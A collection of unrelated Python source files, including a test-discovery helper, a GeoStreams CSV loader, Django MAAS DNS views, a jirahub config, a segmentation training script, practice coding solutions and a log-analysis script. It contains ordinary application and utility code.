# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Test setup helpers for non-doctests.
"""
import unittest
import re
from martian.scan import module_info_from_dotted_name
from z3c.testsetup.base import BasicTestSetup
from z3c.testsetup.util import (get_package, get_marker_from_string,
get_marker_from_file)
class UnitTestSetup(BasicTestSetup):
"""A unit test setup for packages.
A collection of methods to search for appropriate modules in
a given package. ``UnitTestSetup`` is also able to 'register' the
tests found and to deliver them as a ready-to-use
``unittest.TestSuite`` instance.
While the functionality to search for testfiles is mostly
inherited from the base class, the focus here is to setup the
tests correctly.
See file `unittestsetup.py` in the tests/testsetup directory to
learn more about ``UnitTestSetup``.
"""
regexp_list = [
r'^\.{0,2}\s*:(T|t)est-(L|l)ayer:\s*(python)\s*',
]
def __init__(self, package, pfilter_func=None, regexp_list=None):
BasicTestSetup.__init__(self, package, regexp_list=regexp_list)
self.pfilter_func = pfilter_func or self.isTestModule
self.filter_func = self.pfilter_func
def docstrContains(self, docstr):
"""Does a docstring contain lines matching every of the regular
expressions?
"""
found_list = []
if docstr is None:
return False
if get_marker_from_string('unittest', docstr) is not None:
return True
return self.textContains(docstr)
def isTestModule(self, module_info):
"""Return ``True`` if a module matches our expectations for a
test file.
This is the case if it got a module docstring which matches
each of our regular expressions.
"""
# Do not even try to load modules, that have no marker string.
if not self.fileContains(module_info.path):
# No ":test-layer: python" marker, so check for :unittest:.
if get_marker_from_file('unittest', module_info.path) is None:
# Neither the old nor the new marker: this is no test module.
return False
module = None
try:
module = module_info.getModule()
except ImportError:
# Broken module that is probably a test. We absolutely have to
# warn about this!
print("Import error in %s" % module_info.path)
docstr = getattr(module, '__doc__', '')
if not self.docstrContains(docstr):
return False
return True
def getModules(self, package=None):
result = []
if package is None:
package = self.package
info = module_info_from_dotted_name(package.__name__)
for submod_info in info.getSubModuleInfos():
if submod_info.isPackage():
result.extend(self.getModules(submod_info.getModule()))
continue
if not self.pfilter_func(submod_info):
continue
module = submod_info.getModule()
result.append(module)
return result
def getTestSuite(self):
modules = self.getModules(package=self.package)
suite = unittest.TestSuite()
for module in modules:
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
suite.addTest(tests)
return suite
|
from datetime import datetime
class GoveeError(Exception):
pass
class APIError(GoveeError):
pass
class AuthError(APIError):
pass
class DevicesError(APIError):
pass
class RatelimitError(APIError):
def __init__(self, msg: str, time: int):
self.message = msg
self.time = datetime.fromtimestamp(time)
def __str__(self): return self.message
|
"""Loads CSV files into GeoStreams
"""
import argparse
import csv
import datetime
import json
import logging
import os
from typing import Optional, Union
from urllib.parse import urlparse
import requests
from terrautils.betydb import get_sites_by_latlon
from terrautils.spatial import wkt_to_geojson
import configuration
import transformer_class
# Clowder and GeoStreams related definitions
CLOWDER_DEFAULT_URL = os.environ.get('CLOWDER_URL', 'https://terraref.ncsa.illinois.edu/clowder/')
CLOWDER_DEFAULT_KEY = os.environ.get('CLOWDER_KEY', '')
GEOSTREAMS_API_URL_PARTICLE = 'api/geostreams'
GEOSTREAMS_CSV_SENSOR_TYPE = 4
class __internal__():
"""Class for functions intended for internal use only for this file
"""
def __init__(self):
"""Performs initialization of class instance
"""
@staticmethod
def get_geostreams_api_url(base_url: str, url_particles: Union[str, tuple, None]) -> str:
"""Returns the URL constructed from parameters
Arguments:
base_url: the base URL (assumes scheme:[//authority] with optional path)
url_particles: additional strings to append to the end of the base url
Return:
Returns the formatted URL (guaranteed to not have a trailing slash)
"""
def url_join(base_url: str, url_parts: tuple) -> str:
"""Internal function to create URLs in a consistent fashion
Arguments:
base_url: the starting part of the URL
url_parts: the parts of the URL to join
Return:
The formatted URL
"""
built_url = ''
base_parse = urlparse(base_url)
if base_parse.scheme:
built_url = base_parse.scheme + '://'
if base_parse.netloc:
built_url += base_parse.netloc + '/'
if base_parse.path and not base_parse.path == '/':
built_url += base_parse.path.lstrip('/') + '/'
joined_parts = '/'.join(url_parts).replace('//', '/').strip('/')
return built_url + joined_parts
if not url_particles:
return url_join(base_url, tuple(GEOSTREAMS_API_URL_PARTICLE))
if isinstance(url_particles, str):
return url_join(base_url, (GEOSTREAMS_API_URL_PARTICLE, url_particles))
formatted_particles = tuple(str(part) for part in url_particles)
return url_join(base_url, tuple(GEOSTREAMS_API_URL_PARTICLE) + formatted_particles)
@staticmethod
def _common_geostreams_name_get(clowder_url: str, clowder_key: str, url_endpoint: str, name_query_key: str, name: str) -> \
Optional[dict]:
"""Common function for retrieving data from GeoStreams by name
Arguments:
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
url_endpoint: the endpoint to query (URL particle appended to the base URL, eg: 'streams')
name_query_key: the name of the query portion of URL identifying the name to search on (eg: 'stream_name')
name: the name to search on
Return:
Returns the found information, or None if not found
"""
url = __internal__.get_geostreams_api_url(clowder_url, url_endpoint)
params = {name_query_key: name}
if clowder_key:
params['key'] = clowder_key
logging.debug("Calling geostreams url '%s' with params '%s'", url, str(params))
resp = requests.get(url, params)
resp.raise_for_status()
for one_item in resp.json():
if 'name' in one_item and one_item['name'] == name:
logging.debug("Found %s '%s' = [%s]", name_query_key, name, one_item['id'])
return one_item
return None
@staticmethod
def common_geostreams_create(clowder_url: str, clowder_key: str, url_endpoint: str, request_body: str) -> Optional[str]:
"""Common function for creating an object in GeoStreams
Arguments:
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
url_endpoint: the endpoint to query (URL particle appended to the base URL, eg: 'streams')
request_body: the body of the request
Return:
Returns the ID of the created object or None if no ID was returned
"""
url = __internal__.get_geostreams_api_url(clowder_url, url_endpoint)
if clowder_key:
url = url + '?key=' + clowder_key
result = requests.post(url,
headers={'Content-type': 'application/json'},
data=request_body)
result.raise_for_status()
result_id = None
result_json = result.json()
if isinstance(result_json, dict) and 'id' in result_json:
result_id = result_json['id']
logging.debug("Created GeoStreams %s: id = '%s'", url_endpoint, result_id)
else:
logging.debug("Call to GeoStreams create %s returned no ID", url_endpoint)
return result_id
@staticmethod
def get_sensor_by_name(sensor_name: str, clowder_url: str, clowder_key: str) -> Optional[dict]:
"""Returns the GeoStreams sensor information retrieved from Clowder
Arguments:
sensor_name: the name of the data sensor to retrieve
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
Return:
Returns the information on the sensor or None if the stream can't be found
"""
return __internal__._common_geostreams_name_get(clowder_url, clowder_key, 'sensors', 'sensor_name', sensor_name)
@staticmethod
def get_stream_by_name(stream_name: str, clowder_url: str, clowder_key: str) -> Optional[dict]:
"""Returns the GeoStreams stream information retrieved from Clowder
Arguments:
stream_name: the name of the data stream to retrieve
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
Return:
Returns the information on the stream or None if the stream can't be found
"""
return __internal__._common_geostreams_name_get(clowder_url, clowder_key, 'streams', 'stream_name', stream_name)
@staticmethod
def create_sensor(sensor_name: str, clowder_url: str, clowder_key: str, geom: dict, sensor_type: dict, region: str) -> str:
"""Create a new sensor in Geostreams.
Arguments:
sensor_name: name of new sensor to create
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
geom: GeoJSON object of sensor geometry
sensor_type: JSON object with {"id", "title", and "sensorType"}
region: region of sensor
"""
body = {
"name": sensor_name,
"type": "Point",
"geometry": geom,
"properties": {
"popupContent": sensor_name,
"type": sensor_type,
"name": sensor_name,
"region": region
}
}
return __internal__.common_geostreams_create(clowder_url, clowder_key, 'sensors', json.dumps(body))
@staticmethod
def create_stream(stream_name: str, clowder_url: str, clowder_key: str, sensor_id: str, geom: dict, properties=None) -> str:
"""Create the indicated GeoStream
Arguments:
stream_name: the name of the data stream to retrieve
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
sensor_id: the ID of the sensor associated with the stream
geom: the geometry of the stream to create
properties: additional properties for the stream
Return:
The ID of the created stream
"""
body = {
"name": stream_name,
"type": "Feature",
"geometry": geom,
"properties": {} if not properties else properties,
"sensor_id": str(sensor_id)
}
return __internal__.common_geostreams_create(clowder_url, clowder_key, 'streams', json.dumps(body))
@staticmethod
def create_data_points(clowder_url: str, clowder_key: str, stream_id: str, data_point_list: list) -> None:
"""Uploads the data points to GeoStreams
Arguments:
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
stream_id: the ID of the stream to upload to
data_point_list: the list of data points to upload
"""
body = {
"datapoints": data_point_list,
"stream_id": str(stream_id)
}
__internal__.common_geostreams_create(clowder_url, clowder_key, 'datapoints/bulk', json.dumps(body))
@staticmethod
def get_matched_sites(clowder_url: str, clowder_key: str, plot_name: str, lat_lon: tuple, filter_date: str) -> dict:
"""Returns sensor metadata matching the plot
Arguments:
clowder_url: the URL of the Clowder instance to load the file to
clowder_key: the key to use when accessing Clowder
plot_name: name of plot to map data point into if possible, otherwise query BETY
lat_lon: [latitude, longitude] tuple of data point location
filter_date: date used to restrict number of sites returned from BETYdb
Return:
Returns the sites matching the plot and date. An empty dict may be returned
"""
# SENSOR is the plot
matched_sites = {}
if plot_name:
# If provided a plot name, see if the sensor exists before going into more expensive logic
sensor_data = __internal__.get_sensor_by_name(plot_name, clowder_url, clowder_key)
if sensor_data:
matched_sites[sensor_data['id']] = {
"name": plot_name,
"geom": sensor_data['geometry']
}
if not matched_sites:
# If we don't have existing sensor to use quickly, we must query geographically
site_list = get_sites_by_latlon(lat_lon, filter_date)
for one_site in site_list:
plot_name = one_site['sitename']
plot_geom = json.loads(wkt_to_geojson(one_site['geometry']))
# Get existing sensor with this plot name from geostreams, or create if it doesn't exist
sensor_data = __internal__.get_sensor_by_name(plot_name, clowder_url, clowder_key)
if not sensor_data:
sensor_id = __internal__.create_sensor(plot_name, clowder_url, clowder_key, plot_geom,
{
"id": "MAC Field Scanner",
"title": "MAC Field Scanner",
"sensorType": GEOSTREAMS_CSV_SENSOR_TYPE
},
"Maricopa")
matched_sites[sensor_id] = {"name": plot_name, "geom": plot_geom}
else:
sensor_id = sensor_data['id']
matched_sites[sensor_id] = {"name": plot_name, "geom": plot_geom}
return matched_sites
@staticmethod
def create_datapoint(clowder_url: str, clowder_key: str, stream_id: str, geom: dict, start_time: str, end_time: str,
properties: dict = None) -> str:
"""Create a new data point in Geostreams
Arguments:
clowder_url: the URL of the Clowder instance to load the file to
clowder_key: the key to use when accessing Clowder
stream_id: id of stream to attach data point to
geom: GeoJSON object of sensor geometry
start_time: start time, in format 2017-01-25T09:33:02-06:00
end_time: end time, in format 2017-01-25T09:33:02-06:00
properties: JSON object with any desired properties
Return:
The ID of the created data point
"""
body = {
"start_time": start_time,
"end_time": end_time,
"type": "Point",
"geometry": geom,
"properties": properties,
"stream_id": str(stream_id)
}
return __internal__.common_geostreams_create(clowder_url, clowder_key, 'datapoints', json.dumps(body))
@staticmethod
def create_datapoint_with_dependencies(clowder_traits_url: str, clowder_key: str, stream_prefix: str, lat_lon: tuple,
start_time: str, end_time: str, metadata: dict = None, filter_date: str = '',
geom: dict = None, plot_name: str = None) -> None:
""" Submit traits CSV file to Clowder
Arguments:
clowder_traits_url: the URL of the Clowder instance to load the file to
clowder_key: the key to use when accessing Clowder
stream_prefix: prefix of stream to attach data point to
lat_lon: [latitude, longitude] tuple of data point location
start_time: start time, in format 2017-01-25T09:33:02-06:00
end_time: end time, in format 2017-01-25T09:33:02-06:00
metadata: JSON object with any desired properties
filter_date: date used to restrict number of sites returned from BETYdb
geom: geometry for data point (use plot if not provided)
plot_name: name of plot to map data point into if possible, otherwise query BETY
Exceptions:
Raises RuntimeError exception if a Clowder URL is not specified
"""
matched_sites = __internal__.get_matched_sites(clowder_traits_url, clowder_key, plot_name, lat_lon, filter_date)
for sensor_id in matched_sites:
plot_geom = matched_sites[sensor_id]["geom"]
stream_name = "%s (%s)" % (stream_prefix, sensor_id)
stream_data = __internal__.get_stream_by_name(stream_name, clowder_traits_url, clowder_key)
if not stream_data:
stream_id = __internal__.create_stream(stream_name, clowder_traits_url, clowder_key, sensor_id, plot_geom)
else:
stream_id = stream_data['id']
logging.info("Posting datapoint to stream %s", stream_id)
if not geom:
geom = plot_geom
__internal__.create_datapoint(clowder_traits_url, clowder_key, stream_id, geom, start_time, end_time, metadata)
def add_parameters(parser: argparse.ArgumentParser) -> None:
"""Adds parameters
Arguments:
parser: instance of argparse.ArgumentParser
"""
parser.add_argument('--clowder_url', default=CLOWDER_DEFAULT_URL,
help="the url of the Clowder instance to access for GeoStreams (default '%s')" % CLOWDER_DEFAULT_URL)
parser.add_argument('--clowder_key', default=CLOWDER_DEFAULT_KEY,
help="the key to use when accessing Clowder %s" %
("(default: using environment value)" if CLOWDER_DEFAULT_KEY else ''))
# Here we specify a default metadata file that we provide to get around the requirement while also allowing
# pylint: disable=protected-access
for action in parser._actions:
if action.dest == 'metadata' and not action.default:
action.default = ['/home/extractor/default_metadata.json']
break
def check_continue(transformer: transformer_class.Transformer, check_md: dict) -> tuple:
"""Checks if conditions are right for continuing processing
Arguments:
transformer: instance of transformer class
check_md: request specific metadata
Return:
Returns a tuple containing the return code for continuing or not, and
an error message if there's an error
"""
# pylint: disable=unused-argument
for one_file in check_md['list_files']():
if os.path.splitext(one_file)[1].lower() == '.csv':
return tuple([0])
return -1, "Unable to find a CSV file in the list of files"
def perform_process(transformer: transformer_class.Transformer, check_md: dict) -> dict:
"""Performs the processing of the data
Arguments:
transformer: instance of transformer class
check_md: request specific metadata
Return:
Returns a dictionary with the results of processing
"""
# Process each CSV file into BETYdb
start_timestamp = datetime.datetime.now()
files_count = 0
files_csv = 0
lines_read = 0
error_count = 0
files_loaded = []
for one_file in check_md['list_files']():
files_count += 1
if os.path.splitext(one_file)[1].lower() == '.csv':
files_csv += 1
# Make sure we can access the file
if not os.path.exists(one_file):
msg = "Unable to access csv file '%s'" % one_file
logging.debug(msg)
return {'code': -1000,
'error': msg}
try:
# Read in the lines from the file
with open(one_file, 'r') as in_file:
reader = csv.DictReader(in_file)
files_loaded.append(one_file)
for row in reader:
centroid_lonlat = [row['lon'], row['lat']]
time_fmt = row['dp_time']
timestamp = row['timestamp']
dp_metadata = {
"source": row['source'],
"value": row['value']
}
trait = row['trait']
__internal__.create_datapoint_with_dependencies(transformer.args.clowder_url, transformer.args.clowder_key,
trait, (centroid_lonlat[1], centroid_lonlat[0]), time_fmt,
time_fmt, dp_metadata, timestamp)
lines_read += 1
except Exception:
logging.exception("Error reading CSV file '%s'. Continuing processing", os.path.basename(one_file))
error_count += 1
if files_csv <= 0:
logging.info("No CSV files were found in the list of files to process")
if error_count > 0:
logging.error("Errors were found during processing")
return {'code': -1001, 'error': "Too many errors occurred during processing. Please correct and try again"}
return {
'code': 0,
configuration.TRANSFORMER_NAME: {
'version': configuration.TRANSFORMER_VERSION,
'utc_timestamp': datetime.datetime.utcnow().isoformat(),
'processing_time': str(datetime.datetime.now() - start_timestamp),
'num_files_received': str(files_count),
'num_csv_files': str(files_csv),
'lines_loaded': str(lines_read),
'files_processed': str(files_loaded)
}
}
|
from hujan_ui.maas import load_document
from hujan_ui.maas.exceptions import MAASError
import requests
import json
import sweetify
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from hujan_ui.maas.utils import MAAS
from .forms import AddDomainForm, EditDomainForm
@login_required
def index(request):
try:
if settings.WITH_EX_RESPONSE:
domains = load_document('domains.json')
else:
maas = MAAS()
domains = maas.get("domains/").json()
machine_file = open("hujan_ui/maas/ex_response/domains.json", "w")
json.dump(domains, machine_file)
machine_file.close()
context = {
'title': 'DNS',
'domains': domains,
'menu_active': 'domains',
}
except (MAASError, ConnectionError, TimeoutError) as e:
sweetify.sweetalert(request, 'Warning', text=str(e), button='OK', timer=5000)
context = None
return render(request, 'maas/dns/index.html', context)
@login_required
def add(request):
form = AddDomainForm(request.POST or None)
if form.is_valid():
try:
resp = form.save()
if resp.status_code == requests.codes.ok:
sweetify.sweetalert(request, icon='success', text=_('Successfully added domain'), button='Ok', timer=2000)
return redirect("maas:dns:index")
sweetify.warning(request, _('Terjadi suatu kesalahan'), button='Ok', timer=2000)
except (MAASError, ConnectionError, TimeoutError) as e:
sweetify.sweetalert(request, 'Warning', text=str(e), button='Ok', timer=5000)
context = {
'title': 'Add Domain',
'menu_active': 'domains',
'form': form,
'title_submit': 'Save Domain',
'col_size': '4'
}
return render(request, 'maas/form.html', context)
@login_required
def edit(request, id):
try:
maas = MAAS()
domain = maas.get(f"domains/{id}/").json()
form = EditDomainForm(request.POST or None, initial=domain)
if form.is_valid():
resp = form.save(domain['id'])
if resp.status_code in maas.ok:
sweetify.sweetalert(request, 'Success', text=_('Successfully edited domain'), button='Ok', timer=2000)
return redirect("maas:dns:index")
sweetify.warning(request, _(resp.text), button='Ok', timer=2000)
context = {
'title': 'Edit Domain',
'menu_active': 'domains',
'form': form,
'title_submit': 'Save Domain',
'col_size': '4'
}
except (MAASError, ConnectionError, TimeoutError) as e:
sweetify.sweetalert(request, 'Warning', text=str(e), button='Ok', timer=5000)
context = None
return render(request, 'maas/form.html', context)
@login_required
def delete(request, id):
try:
maas = MAAS()
resp = maas.delete(f"domains/{id}/")
if resp.status_code in maas.ok:
sweetify.sweetalert(request, 'Success', icon='success', text=_('Successfully deleted domain'), button='Ok', timer=2000)
else:
sweetify.sweetalert(request, 'Warning', icon='warning', text=_(resp.text), button='Ok', timer=2000)
except (MAASError, ConnectionError, TimeoutError) as e:
sweetify.sweetalert(request, 'Warning', text=str(e), button='Ok', timer=5000, icon='error')
return redirect("maas:dns:index")
|
# This config contains custom settings for all keys
import re
def before_update_hook(updated_issue, updated_issue_fields, other_issue, other_issue_fields):
pass
c.before_issue_update.append(before_update_hook)
c.jira.server = "https://test.jira.server"
c.jira.project_key = "TEST"
c.jira.github_issue_url_field_id = 12345
c.jira.jirahub_metadata_field_id = 67890
c.jira.closed_statuses = ["Closed", "Done"]
c.jira.close_status = "Done"
c.jira.reopen_status = "Ready"
c.jira.open_status = "Open"
c.jira.max_retries = 5
c.jira.notify_watchers = False
c.jira.issue_filter = lambda issue: True
c.jira.sync_comments = True
c.jira.sync_status = True
c.jira.sync_labels = True
c.jira.sync_milestones = True
c.jira.create_tracking_comment = True
c.jira.issue_title_formatter = lambda issue, title: "From GitHub: " + title
c.jira.issue_body_formatter = lambda issue, body: "Check out this great GitHub issue:\n\n" + body
c.jira.comment_body_formatter = lambda issue, comment, body: "Check out this great GitHub comment:\n\n" + body
c.jira.redact_patterns.append(re.compile(r"(?<=secret GitHub data: ).+?\b"))
def jira_issue_create_hook(issue, fields):
fields["issue_type"] = "Bug"
return fields
c.jira.before_issue_create.append(jira_issue_create_hook)
c.github.repository = "testing/test-repo"
c.github.max_retries = 10
c.github.issue_filter = lambda _: True
c.github.sync_comments = True
c.github.sync_status = True
c.github.sync_labels = True
c.github.sync_milestones = True
c.github.create_tracking_comment = True
c.github.issue_title_formatter = lambda issue, title: "From JIRA: " + title
c.github.issue_body_formatter = lambda issue, body: "Check out this great JIRA issue:\n\n" + body
c.github.comment_body_formatter = lambda issue, comment, body: "Check out this great JIRA comment:\n\n" + body
c.github.redact_patterns.append(re.compile(r"(?<=secret JIRA data: ).+?\b"))
def github_issue_create_hook(_, fields):
fields["labels"] = ["jirahub"]
return fields
c.github.before_issue_create.append(github_issue_create_hook)
|
import warnings
warnings.filterwarnings("ignore")
import os
import argparse
import numpy as np
import pandas as pd
from tqdm import tqdm
from multiprocessing import cpu_count
from sklearn.model_selection import train_test_split
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torch.utils.data.sampler import RandomSampler
from steel_dataset import SteelDataset
from utils import seed_everything, get_transforms, get_model, get_loss, do_kaggle_metric
parser = argparse.ArgumentParser(description='')
parser.add_argument('--model', default='Res34Unetv4', type=str, help='Model version')
parser.add_argument('--n_classes', default=4, type=int, help='Number of classes')
parser.add_argument('--loss', default='BCEWithLogitsLoss', type=str, help='Loss function')
parser.add_argument('--fine_size', default=256, type=int, help='Resized image size')
parser.add_argument('--pad_left', default=13, type=int, help='Left padding size')
parser.add_argument('--pad_right', default=14, type=int, help='Right padding size')
parser.add_argument('--batch_size', default=2, type=int, help='Batch size for training')
parser.add_argument('--epoch', default=300, type=int, help='Number of training epochs')
parser.add_argument('--snapshot', default=5, type=int, help='Number of snapshots per fold')
parser.add_argument('--cuda', default=True, type=bool, help='Use cuda to train model')
parser.add_argument('--save_weight', default='weights', type=str, help='weight save space')
parser.add_argument('--max_lr', default=0.01, type=float, help='max learning rate')
parser.add_argument('--min_lr', default=0.001, type=float, help='min learning rate')
parser.add_argument('--momentum', default=0.9, type=float, help='momentum for SGD')
parser.add_argument('--weight_decay', default=1e-4, type=float, help='Weight decay for SGD')
args = parser.parse_args()
fine_size = args.fine_size + args.pad_left + args.pad_right
args.weight_name = 'model_' + str(fine_size) + '_' + args.model
if not os.path.isdir(args.save_weight):
os.mkdir(args.save_weight)
device = torch.device('cuda' if args.cuda else 'cpu')
train_df = pd.read_csv(os.path.join('..', 'input', 'preprocessed_train.csv'))
def test(test_loader, model, criterion):
running_loss = 0.0
precisions = []
model.eval()
for inputs, masks in tqdm(test_loader):
inputs, masks = inputs.to(device), masks.to(device)
with torch.set_grad_enabled(False):
outputs = model(inputs)
loss = criterion(outputs, masks)
predicts = F.sigmoid(outputs).detach().cpu().numpy().squeeze()
truths = masks.detach().cpu().numpy().squeeze()
running_loss += loss.item() * inputs.size(0)
precisions.append(do_kaggle_metric(predicts, truths))
precision = np.mean(precisions)
epoch_loss = running_loss / val_data.__len__()
return epoch_loss, precision
def train(train_loader, model, criterion):
running_loss = 0.0
data_size = train_data.__len__()
model.train()
for inputs, masks in tqdm(train_loader):
inputs, masks = inputs.to(device), masks.to(device)
optimizer.zero_grad()
with torch.set_grad_enabled(True):
logits= model(inputs)
loss = criterion(logits, masks)
loss.backward()
optimizer.step()
running_loss += loss.item() * inputs.size(0)
epoch_loss = running_loss / data_size
return epoch_loss
if __name__ == '__main__':
seed_everything(43)
scheduler_step = args.epoch // args.snapshot
# Get Model
steel = get_model(args.model, args.n_classes)
steel.to(device)
# Setup optimizer
optimizer = torch.optim.SGD(
steel.parameters(),
lr=args.max_lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
optimizer,
scheduler_step,
args.min_lr)
train_idx, valid_idx, _, _ = train_test_split(
train_df.index,
train_df['split_label'],
test_size=0.2,
random_state=43)
train_data = SteelDataset(
train_df.iloc[train_idx],
mode='train',
fine_size=args.fine_size,
pad_left=args.pad_left,
pad_right=args.pad_right,
transforms=get_transforms())
train_loader = DataLoader(
train_data,
shuffle=RandomSampler(train_data),
batch_size=args.batch_size,
num_workers=0, #cpu_count(),
pin_memory=True)
val_data = SteelDataset(
train_df.iloc[valid_idx],
mode='valid',
fine_size=args.fine_size,
pad_left=args.pad_left,
pad_right=args.pad_right,
transforms=get_transforms())
val_loader = DataLoader(
val_data,
shuffle=False,
batch_size=args.batch_size,
num_workers=0, #cpu_count(),
pin_memory=True)
num_snapshot = 0
best_acc = 0
criterion = get_loss(args.loss)
for epoch in tqdm(range(args.epoch)):
train_loss = train(train_loader, steel, criterion)
val_loss, accuracy = test(val_loader, steel, criterion)
lr_scheduler.step()
if accuracy > best_acc:
best_acc = accuracy
best_param = steel.state_dict()
if (epoch + 1) % scheduler_step == 0:
torch.save(
best_param,
os.path.join(args.save_weight, args.weight_name + str(num_snapshot) + '.pth'))
optimizer = torch.optim.SGD(
steel.parameters(),
lr=args.max_lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
optimizer,
scheduler_step,
args.min_lr)
num_snapshot += 1
best_acc = 0
print('epoch: {} train_loss: {:.3f} val_loss: {:.3f} val_accuracy: {:.3f}'.format(epoch + 1, train_loss,
val_loss, accuracy))
|
# Problem 1: Merge Two Sorted Lists
# Merge two sorted linked lists and return it as a new sorted list.
# The new list should be made by splicing together the nodes of the first two lists.
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution(object):
def mergeTwoLists(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
# Merge two sorted linked lists and return it as a new sorted list.
# The new list should be made by splicing together the nodes of the first two lists.
if not l1:
return l2
elif not l2:
return l1
elif l1 and l2:
if l1.val > l2.val:
l1, l2 = l2, l1
if l1.next:
return ListNode(l1.val, self.mergeTwoLists(l1.next, l2))
else:
return ListNode(l1.val, l2)
# Problem 2: Decode String
def decodeString(s):
"""
:type s: str
:rtype: str
"""
# Given an encoded string, return its decoded string.
# The encoding rule is: k[encoded_string], where the encoded_string inside the square brackets is being repeated exactly k times. Note that k is guaranteed to be a positive integer.
# You may assume that the input string is always valid
# No extra white spaces, square brackets are well-formed, etc.
# Furthermore, you may assume that the original data does not contain any digits and that digits are only for those repeat numbers, k. For example, there won't be input like 3a or 2[4].
# start at end of encoded string
# if current item is letter, add to beginning of decoded
# if current item is ]:
# find [
# save string in between []
# get number before [
# repeat-add to beginning of decoded the string in between [] as many times as number
decoded = ""
close_brackets = [index for index, letter in enumerate(s) if letter == str("]")]
open_brackets = [index for index, letter in enumerate(s) if letter == str("[")]
for letter in reversed(s):
if letter.isalpha():
decoded = letter + decoded
elif letter == str("]"):
last_close_bracket = close_brackets[-1]
del close_brackets[-1]
# find [
last_open_bracket = open_brackets[-1]
del open_brackets[-1]
# save string in between []
end_sub = last_close_bracket
start_sub = last_open_bracket + 1
substring = s[start_sub:end_sub]
# get number before [
repeat_times = int(s[last_open_bracket-1])
# repeat-add to beginning of decoded the string in between [] as many times as number
for x in range(0, repeat_times-1):
decoded = substring + decoded
print(decoded)
return decoded
decodeString("3[a]2[bc]")
decodeString("3[a2[c]]")
|
from .customstockenv import CustomStockEnv
class CustomStockEnvDefault(CustomStockEnv):
def __init__(self, data, config):
super(CustomStockEnvDefault, self).__init__(data, config)
self.prediction = False
def _predict_response(self, data):
print("Incorrect flow. Cannot predict for this env...")
exit()
|
import re
import textwrap
def justify_text(_text, w, align="left", fill=" "):
wrapper = textwrap.TextWrapper(width=w)
dedented_text = textwrap.dedent(text=_text)
txt = wrapper.fill(text=dedented_text)
def justify_both(get_text, _width):
prev_txt = get_text
while((l := _width-len(get_text)) > 0):
get_text = re.sub(r"(\s+)", r"\1 ", get_text, count=l)
if(get_text == prev_txt):
break
return get_text.rjust(_width)
_justify_res = ""
if align == 'left':
for l in txt.splitlines():
_justify_res += l.ljust(w, fill)+"\n"
elif align == 'right':
for l in txt.splitlines():
_justify_res += l.rjust(w, fill)+"\n"
elif align == 'center':
for l in txt.splitlines():
_justify_res += l.center(w, fill)+"\n"
elif align == 'justify':
for l in txt.splitlines():
_justify_res += justify_both(l, w)+"\n"
return _justify_res
|
from common.tflogs2pandas import tflog2pandas
import pickle
import hashlib
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from common.gym_interface import template
with open("output_data/jobs_vanilla4.pickle", "rb") as f:
jobs = pickle.load(f)
read_cache = True
try:
if not read_cache:
raise Exception("read raw data")
vanilla4_results = pd.read_pickle("output_data/tmp/vanilla4_results")
vanilla4_results_full = pd.read_pickle("output_data/tmp/vanilla4_results_full")
except Exception as e:
results = []
dfs = []
for idx, job in jobs.items():
ret = job.copy()
str_bodies = "-".join([str(x) for x in job["vanilla_bodies"]])
str_md5 = hashlib.md5(job["custom_alignment"].encode()).hexdigest()
seed = job["seed"]
path = f"output_data/tensorboard_vanilla/model-{str_bodies}-CustomAlignWrapper-md{str_md5}-sd{seed}/PPO_1"
print(f"Loading {path}")
df = tflog2pandas(path)
df = df[df["metric"].str.startswith("eval/")]
max_value_399 = df[df["metric"]=="eval/399_mean_reward"]["value"].max()
max_value_499 = df[df["metric"]=="eval/499_mean_reward"]["value"].max()
max_value_599 = df[df["metric"]=="eval/599_mean_reward"]["value"].max()
max_value_699 = df[df["metric"]=="eval/699_mean_reward"]["value"].max()
print(max_value_399)
ret["path"] = path
ret["max_value_399"] = max_value_399
ret["max_value_499"] = max_value_499
ret["max_value_599"] = max_value_599
ret["max_value_699"] = max_value_699
results.append(ret)
df["str_md5"] = str_md5
df["seed"] = seed
dfs.append(df)
vanilla4_results = pd.DataFrame(results)
vanilla4_results.to_pickle("output_data/tmp/vanilla4_results")
vanilla4_results_full = pd.concat(dfs, ignore_index=True)
vanilla4_results_full.to_pickle("output_data/tmp/vanilla4_results_full")
bodies = [399,499,599,699]
for body in bodies:
vanilla4_results[f"rank_{body}"] = vanilla4_results[f"max_value_{body}"].rank()
A = vanilla4_results["max_value_399"]
B = vanilla4_results["max_value_499"]
C = vanilla4_results["max_value_599"]
D = vanilla4_results["max_value_699"]
vanilla4_results["combined_value"] = 2*A + B + C + 0.5*D
vanilla4_results["combined_rank"] = vanilla4_results["combined_value"].rank()
vanilla4_results = vanilla4_results.sort_values(by="combined_rank", ascending=False)
print(vanilla4_results.head(10))
print(vanilla4_results.tail(10))
fig, axes = plt.subplots(ncols=2, nrows=2, sharey=True)
axes = axes.flatten()
for ax, body in zip(axes,bodies):
g = sns.histplot(data=vanilla4_results, x=f"max_value_{body}", ax=ax)
g.set(xlabel="Max Value")
g.set_title(template(body))
plt.tight_layout()
